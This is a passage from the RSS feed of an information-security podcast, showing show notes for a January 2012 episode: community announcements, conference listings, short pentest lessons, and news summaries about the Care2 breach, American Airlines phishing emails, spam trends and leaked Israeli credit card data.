	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Social Engineering Training
	When: March 5-9 
	Where: Seattle, Washington
	When: April 9-13 
	Where: Bristol, UK
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: Know not only how to use the tool, but what the tool can/cannot do.
	Lesson 2: ALWAYS read the Statement of Work (SOW) before you show-up on-site. &#160;
	Lesson 3: Write down what you&#39;ve found, include the how and when* 
	Lesson 4: When you run an exploit, don&#8217;t do it blindly. Always, always, know what the exploit does, and how it will affect the machine you&#8217;re attacking. (deploying an &#8220;agent&#8221; means you`ve exploited the machine)
	* Very Important 
	&#160;
Stories
Source: &#160;http://news.cnet.com/8301-30685_3-57350968-264/mobile-browsing-reaches-all-time-high
If you haven&#39;t whipped your Web site into shape for easy viewing on small-screen devices, you&#39;d better get cracking.
	Mobile browsing reached its highest levels so far, 7.7 percent of total browser usage, in December.
	(Credit: Net Applications)
	That&#39;s because the use of mobile devices reached an all-time high in December, accounting for 7.7 percent of browser usage according to Net Applications&#39; measurements of daily visits to its network of 40,000 Web sites. That may still be a small fraction of total Web traffic, but it&#39;s a large and growing population in absolute numbers.
	Tablet browsing in many ways is similar to desktop browsing; screen resolution on the dominant iPad and iPad 2 aren&#39;t that far off a laptop. But touch interfaces are different from mouse interfaces, especially when it comes to tapping buttons with precision. And smaller tablets are awkwardly in between the iPad and mobile-phone scr[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 558 &#8211; Care2, AA Phishing, Yea! India, Israel CC &amp; BigMac Scam/Spam</title>
		<link>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam</link>
		<comments>http://www.isdpodcast.com/episode-558-care2-aa-phishing-yea-india-israel-cc-bigmac-scamspam#comments</comments>
		<pubDate>Wed, 04 Jan 2012 01:52:25 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3326</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 558 for January 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 558 for January 3, 2012. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9 <br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 9-13 <br class="kix-line-break" /><br />
	Where: Bristol, UK</span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.care2.com/care2blog/to-all-care2-members-security-breach.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.care2.com/care2blog/to-all-care2-members-security-breach.html</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The website of Care2, an organization that&rsquo;s all about living a healthy, green lifestyle, has been breached in the last days of December by an unknown hacker team that managed to access the login information belonging to a number of the site&rsquo;s members.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The official statement released by the company claims that only a limited number of Care2 member accounts were accessed by the cybercriminals, but as a precaution measure, all their 17,911,623 account holders are forced to change their passwords on their next log-in.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We sincerely apologize for this inconvenience. Given our large membership size, we have become a significant target for spammers and hackers over the past few years, and this was the first hacking attempt that successfully breached our protective walls,&rdquo; Care2 representatives wrote on the site&rsquo;s blog.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The vulnerabilities which the hackers used to penetrate the site&rsquo;s defenses were immediately patched up to prevent further access, but the incident is still being investigated to determine the full extent of the breach.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI has been contacted to investigate the matter, but so far, the only clues to point to the identity of the attackers are some IP addresses from Russia. This, however, doesn&rsquo;t necessarily prove that the attack was launched from there. It could be that the hackers compromised devices from this certain location.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since no financial information is stored in the site&rsquo;s databases, the hackers may have targeted Care2 in order to obtain passwords which they can later use to gain access to other accounts, including ones that contain more sensitive data.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is exactly why customers are advised not only to change their passwords on the breached site, but also on others that share the same credentials. This procedure has to be done in the shortest time since after they get their hands on the loot, the crooks will try to make the best of it before their victims get to do anything about it.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The latest fraudulent emails that target American Airlines customers, but these scams recorded a considerable increase and that&rsquo;s why I think this is a good opportunity to remind everyone of the plots. Also, we&rsquo;ll take a look at the company&rsquo;s official statement on the matter.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After reading the previous article, tens of readers shared the fake emails they received in which they were alerted on the fact that a ticket had been purchased using their</span><a href="http://news.softpedia.com/news/American-Airlines-Fake-Ticket-Purchase-Scams-Hit-the-Roof-243983.shtml#"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> credit cards</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The phony emails that bear the subject &ldquo;Re: Your Flight Order N590&rdquo; look something like this:</span></p>
<p>	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear Customer,</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FLIGHT ELECTRONIC NUMBER 8532856</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DATE &amp; TIME / NOVEMBER 28, 2011, 11:17 PM</span><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ARRIVING: </span><a href="http://youvebeenpwned.org/"><span style="font-size:15px;font-family:Courier New;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">NEW YORK JFK</span></a><br />
	<span style="font-size:15px;font-family:Courier New;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">TOTAL PRICE : 278.02 USD</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Targeted customers report that the name of the destination may vary, Tulsa, Worcester, Oxnard, Stockton, Long Beach, Chicago and Houston being among the names mentioned in the email.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since they noticed that the number of false notices increased considerably and even moved to target fax machines, the company quickly acted on informing flyers about the malicious plot.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;American Airlines will never ask you to perform security-related changes to your account in this fashion or send emails to collect user names, passwords, email addresses or other personal information,&rdquo; reads the company&rsquo;s</span><a href="http://www.aa.com/i18n/urls/phishingEmails.jsp"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> statement</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;If you receive an email claiming to be from American Airlines, that asks for account information, it should be considered fraudulent and an attempt to obtain personal information that may be used to commit fraud. If you receive a phishing fax, please disregard and destroy the fax.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Users who come across similar emails or even faxes are advised to immediately delete them to protect themselves from whatever may be hiding behind the attachments or the links that accompany the messages.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In addition, here are certain things that can give away the true identity of such a phony notice:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- phony messages always ask for personal information;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- they address the recipient with generic titles such as &ldquo;dear customer;&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- they make false threats and claims, alerting users that their accounts will be terminated or their credit cards will be charged;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- in most cases, they are full of typos or poor grammar since a majority are sent by cybercriminals from other countries than the US.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.news24.com/SciTech/News/India-becomes-junk-mail-hotspot-20120103</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">India has emerged as the world&#39;s top source of junk mail as spammers make use of lax laws and absent enforcement to turn the country into a centre of unsolicited e-mail.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A recent report by Kaspersky Lab, a Moscow-based global internet security firm, says more spam was sent from the south Asian giant than anywhere else in the world in the third quarter of the year.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An average of 79.8% of e-mail traffic in the three months to the end of September was junk. Of that, 14.8% originated in India, 10.6% came from Indonesia, and 9.7% from Brazil.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Darya Gudkova, a spam analyst at Kaspersky, said the statistics reflect a growing trend for spam to be sent from computers in Asian and Latin America countries.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.jpost.com/International/Article.aspx?id=251943&amp;R=R4"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.jpost.com/International/Article.aspx?id=251943&amp;R=R4</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers published the list of cards, names and other personal details on the One sports website, which was hacked.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers published a 30 megabyte file containing the details. &nbsp;Israeli credit card companies have urged their customers to remain calm, and said they are taking all the required steps to secure credit accounts.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Visa CAL announced that it would suspend all accounts that were detailed in the post. The company said it would contact the affected customers Tuesday and issue them new credit cards.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Bank of Israel announced it would review the matter.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Army Radio, the hackers encouraged readers to use the information posted online to make purchases, and said they &nbsp;would continue to publish more account information already in their possession.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.trendmicro.com/mcdonalds-gift-card-spam-on-twitter</span></a><br />
